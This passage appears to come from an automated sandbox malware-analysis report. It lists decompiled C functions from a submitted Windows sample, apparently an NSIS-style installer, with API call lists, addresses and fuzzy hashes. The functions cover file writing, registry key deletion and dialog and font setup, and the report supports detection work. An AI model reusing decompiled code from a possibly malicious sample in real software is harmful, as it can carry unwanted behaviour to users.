				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                                                    0x00402950
                                                                                    0x00402952
                                                                                    0x00402957
                                                                                    0x0040295c
                                                                                    0x0040295f
                                                                                    0x00402969
                                                                                    0x0040296d
                                                                                    0x0040296d
                                                                                    0x00402973
                                                                                    0x00402980
                                                                                    0x00402988
                                                                                    0x0040298b
                                                                                    0x00402997
                                                                                    0x0040299a
                                                                                    0x004029a0
                                                                                    0x004029ae
                                                                                    0x004029b3
                                                                                    0x004029b7
                                                                                    0x004029ba
                                                                                    0x004029c3
                                                                                    0x004029cf
                                                                                    0x004029d3
                                                                                    0x004029d6
                                                                                    0x004029e0
                                                                                    0x004029ff
                                                                                    0x004029e7
                                                                                    0x004029ec
                                                                                    0x004029f4
                                                                                    0x004029f7
                                                                                    0x004029fc
                                                                                    0x004029fc
                                                                                    0x00402a06
                                                                                    0x00402a06
                                                                                    0x00402a13
                                                                                    0x00402a19
                                                                                    0x00402a1f
                                                                                    0x00402a1f
                                                                                    0x004029b7
                                                                                    0x00402a33
                                                                                    0x00402a35
                                                                                    0x00402a35
                                                                                    0x00402a3f
                                                                                    0x00402a40
                                                                                    0x00402a44
                                                                                    0x00402a48
                                                                                    0x00402a4e
                                                                                    0x00402a4e
                                                                                    0x00402a55
                                                                                    0x004022f1
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                    • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2667972263-0
                                                                                    • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                    • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                                                    • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                    • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 77%
                                                                                    			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















                                                                                    0x00404e7a
                                                                                    0x00404e7f
                                                                                    0x00404e87
                                                                                    0x00404e88
                                                                                    0x00404e95
                                                                                    0x00404e9d
                                                                                    0x00404e9e
                                                                                    0x00404ea0
                                                                                    0x00404ea2
                                                                                    0x00404ea4
                                                                                    0x00404ea7
                                                                                    0x00404ea7
                                                                                    0x00404eae
                                                                                    0x00404eb4
                                                                                    0x00404eb4
                                                                                    0x00404ebb
                                                                                    0x00404ec2
                                                                                    0x00404ec5
                                                                                    0x00404ec8
                                                                                    0x00404ec8
                                                                                    0x00404ecc
                                                                                    0x00404edc
                                                                                    0x00404ede
                                                                                    0x00404ee1
                                                                                    0x00404e8a
                                                                                    0x00404e8a
                                                                                    0x00404e91
                                                                                    0x00404e91
                                                                                    0x00404ee9
                                                                                    0x00404ef4
                                                                                    0x00404f0a
                                                                                    0x00404f1b
                                                                                    0x00404f37

                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                    • wsprintfW.USER32 ref: 00404F1B
                                                                                    • SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                    • String ID: %u.%u%s%s$H7B
                                                                                    • API String ID: 3540041739-107966168
                                                                                    • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                    • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                                                    • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                    • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 70E22480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 85%
                                                                                    			E70E22480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E70E2135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E70E212E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M70E225F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E70E213B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E70E213B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x70e2506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x70e2506c, __eax,  *0x70e2506c, 0, 0);
									goto L27;
								case 4:
									__eax = E70E212CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E70E213B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x70e2506c =  *0x70e25074 + ( *(__esi + 0x18) - 1) *  *0x70e2506c * 2 + 0x18;
									 *__ebx =  *0x70e25074 + ( *(__esi + 0x18) - 1) *  *0x70e2506c * 2 + 0x18;
									asm("cdq");
									__eax = E70E21510(__edx,  *0x70e25074 + ( *(__esi + 0x18) - 1) *  *0x70e2506c * 2 + 0x18, __edx,  *0x70e25074 + ( *(__esi + 0x18) - 1) *  *0x70e2506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E70E212CC(0x70e25044);
					goto L10;
				}
			}











                                                                                    0x70e22494
                                                                                    0x70e22498
                                                                                    0x70e224a3
                                                                                    0x70e224a3
                                                                                    0x70e224aa
                                                                                    0x70e224af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e224b3
                                                                                    0x70e224b6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e224bb
                                                                                    0x70e224c6
                                                                                    0x70e224d6
                                                                                    0x00000000
                                                                                    0x70e224cd
                                                                                    0x70e224cf
                                                                                    0x70e224e5
                                                                                    0x00000000
                                                                                    0x70e224e5
                                                                                    0x70e224bd
                                                                                    0x70e224bd
                                                                                    0x70e224e6
                                                                                    0x70e224e6
                                                                                    0x70e224e8
                                                                                    0x70e224ec
                                                                                    0x70e224ec
                                                                                    0x70e224ef
                                                                                    0x70e224ef
                                                                                    0x70e224f7
                                                                                    0x70e224ff
                                                                                    0x70e22502
                                                                                    0x70e225c1
                                                                                    0x70e225c2
                                                                                    0x70e225cd
                                                                                    0x70e225f7
                                                                                    0x70e225f7
                                                                                    0x70e225dd
                                                                                    0x70e225e9
                                                                                    0x70e225df
                                                                                    0x70e225df
                                                                                    0x70e225df
                                                                                    0x00000000
                                                                                    0x70e22508
                                                                                    0x70e22508
                                                                                    0x00000000
                                                                                    0x70e2250f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e22517
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e22525
                                                                                    0x70e22527
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e22548
                                                                                    0x70e2254e
                                                                                    0x70e22551
                                                                                    0x70e22553
                                                                                    0x70e22563
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e22530
                                                                                    0x70e22535
                                                                                    0x70e22538
                                                                                    0x70e22539
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e2256f
                                                                                    0x70e22575
                                                                                    0x70e22576
                                                                                    0x70e22579
                                                                                    0x70e2257a
                                                                                    0x70e2257c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e22588
                                                                                    0x70e2258b
                                                                                    0x70e22597
                                                                                    0x70e22599
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e225a5
                                                                                    0x70e225b1
                                                                                    0x70e225b4
                                                                                    0x70e225b6
                                                                                    0x70e225b9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e22508
                                                                                    0x70e22502
                                                                                    0x70e224db
                                                                                    0x70e224e0
                                                                                    0x00000000
                                                                                    0x70e224e0

                                                                                    APIs
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 70E225C2
                                                                                      • Part of subcall function 70E212CC: lstrcpynW.KERNEL32(00000000,?,70E2137F,00000019,70E211CA,-000000A0), ref: 70E212DC
                                                                                    • GlobalAlloc.KERNEL32(00000040), ref: 70E22548
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 70E22563
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.15006371066.0000000070E21000.00000020.00000001.01000000.00000004.sdmp, Offset: 70E20000, based on PE: true
                                                                                    • Associated: 00000001.00000002.15006311880.0000000070E20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.15006427903.0000000070E24000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.15006474894.0000000070E26000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_70e20000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                    • String ID:
                                                                                    • API String ID: 4216380887-0
                                                                                    • Opcode ID: 9a877abb5ba16c7fe7dd9ce36557a7c976a3d736281afbe63c29b8d4219c70dd
                                                                                    • Instruction ID: 860ea63be2be71f84a71a1f8e42f28cc026927bdb59a5e6befeadc1e0ce7fa31
                                                                                    • Opcode Fuzzy Hash: 9a877abb5ba16c7fe7dd9ce36557a7c976a3d736281afbe63c29b8d4219c70dd
                                                                                    • Instruction Fuzzy Hash: CC41CDB2008B05EFD324EF24EC40A2E77FCFB54312F20891EF556862A1E770A545DB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 48%
                                                                                    			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                                    0x00402eb4
                                                                                    0x00402ebd
                                                                                    0x00402ec6
                                                                                    0x00402ed2
                                                                                    0x00402edb
                                                                                    0x00402ee5
                                                                                    0x00402f0a
                                                                                    0x00402f10
                                                                                    0x00402f15
                                                                                    0x00402f16
                                                                                    0x00402f46
                                                                                    0x00402f1f
                                                                                    0x00402f21
                                                                                    0x00402f71
                                                                                    0x00402f74
                                                                                    0x00000000
                                                                                    0x00402f7a
                                                                                    0x00402f30
                                                                                    0x00402f35
                                                                                    0x00402f37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402f3f
                                                                                    0x00402f44
                                                                                    0x00402f45
                                                                                    0x00402f45
                                                                                    0x00402f52
                                                                                    0x00402f5a
                                                                                    0x00402f61
                                                                                    0x00000000
                                                                                    0x00402f8a
                                                                                    0x00000000
                                                                                    0x00402f69
                                                                                    0x00402ef5
                                                                                    0x00402f08
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402f08
                                                                                    0x00402f90

                                                                                    APIs
                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseEnum$DeleteValue
                                                                                    • String ID:
                                                                                    • API String ID: 1354259210-0
                                                                                    • Opcode ID: 953796069c20d6fa7490a0bfa1861ca0c616837e62ffc418281f2642f3cef6d6
                                                                                    • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                                    • Opcode Fuzzy Hash: 953796069c20d6fa7490a0bfa1861ca0c616837e62ffc418281f2642f3cef6d6
                                                                                    • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 77%
                                                                                    			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                                    0x00401d81
                                                                                    0x00401d85
                                                                                    0x00401d9a
                                                                                    0x00401d87
                                                                                    0x00401d89
                                                                                    0x00401d8f
                                                                                    0x00401d8f
                                                                                    0x00401da0
                                                                                    0x00401da3
                                                                                    0x00401dad
                                                                                    0x00401db0
                                                                                    0x00401db8
                                                                                    0x00401dc9
                                                                                    0x00401dcc
                                                                                    0x00401dd7
                                                                                    0x00401dce
                                                                                    0x00401dd0
                                                                                    0x00401dd0
                                                                                    0x00401ddb
                                                                                    0x00401de5
                                                                                    0x00401e0c
                                                                                    0x00401e1b
                                                                                    0x00401e29
                                                                                    0x00401e31
                                                                                    0x00401e39
                                                                                    0x00401e39
                                                                                    0x00401e42
                                                                                    0x00401e48
                                                                                    0x00402ba4
                                                                                    0x00402ba4
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                    • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                    • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                    • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                    • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                    • String ID:
                                                                                    • API String ID: 1849352358-0
                                                                                    • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                    • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                                                    • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                    • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 73%
                                                                                    			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                    0x00401e4e
                                                                                    0x00401e59
                                                                                    0x00401e5b
                                                                                    0x00401e68
                                                                                    0x00401e7f
                                                                                    0x00401e84
                                                                                    0x00401e91
                                                                                    0x00401e96
                                                                                    0x00401e9a
                                                                                    0x00401ea5
                                                                                    0x00401eac
                                                                                    0x00401ebe
                                                                                    0x00401ec4
                                                                                    0x00401ec9
                                                                                    0x00401ed3
                                                                                    0x00402638
                                                                                    0x0040156d
                                                                                    0x00402ba4
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • GetDC.USER32(?), ref: 00401E51
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                      • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                      • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                    • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                                    Memory Dump Source
